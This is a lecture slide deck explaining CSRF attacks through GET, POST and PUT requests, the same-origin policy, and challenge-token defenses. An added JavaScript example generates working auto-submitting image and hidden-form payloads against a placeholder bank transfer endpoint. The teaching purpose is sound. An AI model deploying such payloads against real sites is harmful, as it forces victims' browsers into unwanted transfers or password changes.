
1 CSRF Attacks Daniel Chen 11/18/15

2 What is CSRF?
- Cross Site Request Forgery (pronounced "sea-surf")
- AKA XSRF / one-click attack / session riding. "Sidejacking" is often listed alongside these, but it is a different attack: stealing the session cookie off the wire and replaying it.
- Exploits the trust a site places in the victim's browser
- Browsers automatically attach credentials (the session cookie) to every request sent to the site, no matter which page the request originated from
- Tricks the victim's browser into submitting a request the victim never intended to make
- Normally aims at state-changing effects (transfers, password changes): the attacker cannot read the response, only cause the action

3 How Does it Work?
- Build an exploit URL or script, e.g. http://bank.com/transfer.do?acct=h4ck3r&amount=100000
- Use social engineering: disguise the link and make it appealing so the victim clicks it while logged in to bank.com
- Or skip the click entirely: embed the request in a page (an image tag, a hidden form) so the browser submits it automatically when the page loads

4 HTTP Methods - GET
- GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1
- Same as the URL above. Anything that makes the browser fetch a URL delivers it: a link, an <img src=...>, a redirect. GET is the easiest case, which is why state-changing actions should never be reachable by GET.

5 HTTP Methods - POST
- POST http://bank.com/transfer.do HTTP/1.1
  acct=BOB&amount=100
- The body is form-encoded, so a hidden <form method="POST"> on the attacker's page, with the parameters in hidden inputs, produces exactly this request
- Automatically submit the form with JavaScript when the page loads; no click required

6 HTTP Methods - PUT/DELETE
- Harder to do: no HTML element issues a PUT or DELETE, so you need JavaScript (XMLHttpRequest or fetch)
- PUT http://bank.com/transfer.do HTTP/1.1
  { "acct":"BOB", "amount":100 }
- The slide's script:

    // Cross-origin PUT with a JSON body, sent from the attacker's page.
    function put() {
      var x = new XMLHttpRequest();
      x.open("PUT", "http://bank.com/transfer.do", true);
      x.setRequestHeader("Content-Type", "application/json");
      x.send(JSON.stringify({ "acct": "BOB", "amount": 100 }));
    }

- Doesn't work on modern browsers: a cross-origin PUT with application/json is not a CORS "simple request", so the browser sends an OPTIONS preflight first. bank.com does not answer with an Access-Control-Allow-Origin for the attacker's origin, so the real request is never sent. The same applies to a POST with application/json from script; a form-encoded POST from an HTML form (slide 5) has no preflight, which is why it still works.
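The three delivery methods from slides 3 to 6, as an added example that is not part of the original slides: it builds the attacker-side GET and POST payloads and implements the browser rule (the CORS simple-request rule from the Fetch standard) that decides why the slide 6 PUT never reaches the server. bank.com, transfer.do, acct and amount are the slides' placeholders; the function names and everything else are constructed here. It runs under Node.js and makes no network requests.

```javascript
// Added example, not from the slides: the attacker-side delivery methods
// from slides 3-6, and the browser rule that decides which of them reach
// the server with the victim's cookies. bank.com, transfer.do, acct and
// amount are the slides' placeholders; everything else is constructed here.

// Minimal HTML attribute escaping so parameter values can't break the markup.
function esc(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Slides 3-4: a GET is delivered by anything that makes the browser fetch a
// URL. A 1x1 image fires as soon as the attacker's page renders; the victim
// never clicks, and the session cookie for bank.com goes along with it.
function getPayload(action, params) {
  const qs = new URLSearchParams(params).toString();
  return `<img src="${esc(action + "?" + qs)}" width="1" height="1" alt="">`;
}

// Slide 5: a POST needs a form. Hidden inputs carry the parameters and a
// script submits the form on load. A form-encoded cross-site POST is sent
// without any CORS check, so the bank sees an ordinary logged-in POST.
function postPayload(action, params) {
  const inputs = Object.entries(params)
    .map(([k, v]) => `<input type="hidden" name="${esc(k)}" value="${esc(v)}">`)
    .join("\n    ");
  return `<form id="csrf" action="${esc(action)}" method="POST">
    ${inputs}
  </form>
  <script>document.getElementById("csrf").submit();</script>`;
}

// Slide 6: why the PUT + JSON XMLHttpRequest fails. A cross-origin request
// is "simple" (sent without a preflight) only if the method is GET/HEAD/POST,
// the headers are limited to Accept, Accept-Language, Content-Language and
// Content-Type, and the Content-Type is one of three form/text types.
// Anything else triggers an OPTIONS preflight, and since bank.com will not
// answer it with Access-Control-Allow-Origin for the attacker's origin, the
// real request is never sent.
const SIMPLE_METHODS = new Set(["GET", "HEAD", "POST"]);
const SIMPLE_HEADERS = new Set(["accept", "accept-language", "content-language", "content-type"]);
const SIMPLE_CONTENT_TYPES = new Set([
  "application/x-www-form-urlencoded",
  "multipart/form-data",
  "text/plain",
]);

function needsPreflight(method, headers = {}) {
  if (!SIMPLE_METHODS.has(method.toUpperCase())) return true;
  for (const [name, value] of Object.entries(headers)) {
    const n = name.toLowerCase();
    if (!SIMPLE_HEADERS.has(n)) return true;
    if (n === "content-type") {
      const mime = value.split(";")[0].trim().toLowerCase();
      if (!SIMPLE_CONTENT_TYPES.has(mime)) return true;
    }
  }
  return false;
}

// Classify the requests shown on slides 4-6 plus a JSON POST for contrast.
// "reaches server" means the browser sends it with cookies and no preflight
// stands in the way.
function classifySlideRequests() {
  const cases = {
    slide4_get: ["GET", {}],
    slide5_form_post: ["POST", { "Content-Type": "application/x-www-form-urlencoded" }],
    slide6_xhr_put_json: ["PUT", { "Content-Type": "application/json" }],
    xhr_post_json: ["POST", { "Content-Type": "application/json" }],
  };
  const out = {};
  for (const [name, [method, headers]] of Object.entries(cases)) {
    out[name] = needsPreflight(method, headers) ? "blocked by preflight" : "reaches server";
  }
  return out;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(getPayload("http://bank.com/transfer.do", { acct: "BOB", amount: 100 }));
  console.log(postPayload("http://bank.com/transfer.do", { acct: "BOB", amount: 100 }));
  console.log(classifySlideRequests());
}
```

Run it with node to see the two payloads and the classification. The takeaway for the defender is that the preflight only protects requests a plain HTML form cannot express; GET and form-encoded POST must be protected by the server itself, which is what the token on the following slides does.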

7 Same Origin Policy
- Restricts scripts: a page may only read data (responses, DOM, cookies) that belongs to its own origin (scheme + host + port)
- Note what it does not do: it does not stop the attacker's page from sending requests to bank.com with the victim's cookies attached; it only stops the attacker from reading the responses. That is exactly why CSRF works at all, and also why the token defense below works.

8 Prevent CSRF Attacks
- Use "challenge tokens" (also called anti-CSRF or synchronizer tokens)
- On sensitive areas (forms and endpoints that change state) add a special token, carried in a hidden form field or a custom header, never only in the cookie

9 Prevent CSRF Attacks
- The token is randomly generated each session per user (unpredictable, from a cryptographic random source), and the server records it
- The attacker can't see what the token is: the page that carries it belongs to bank.com, and same origin policy stops the attacker's page from reading it
- So the attacker can't load a request with the right token already in it; a made-up token will not match
- The server must reject any state-changing request whose token is missing or does not match the one recorded for that session

10 Challenge Token Example - Legit
Client to server:
  GET "password change form"
  My session cookie is 365835
Server to client:
  [form] New Password: ____
  CSRF token: 535631
Client to server:
  New password is ****, csrf token is 535631, session cookie is 365835
Server to client:
  session cookie and csrf token match
  Password changed!

11 Challenge Token Example - Attacker
- Attacker crafts a GET URL that would trick Alice's browser into sending a password change request if she clicks it
- Attacker randomly makes up a CSRF token and puts it in the URL
Client to server:
  New password is ****, csrf token is 762548
  My session cookie is 365835
Server to client:
  csrf token doesn't match
  Password change failed
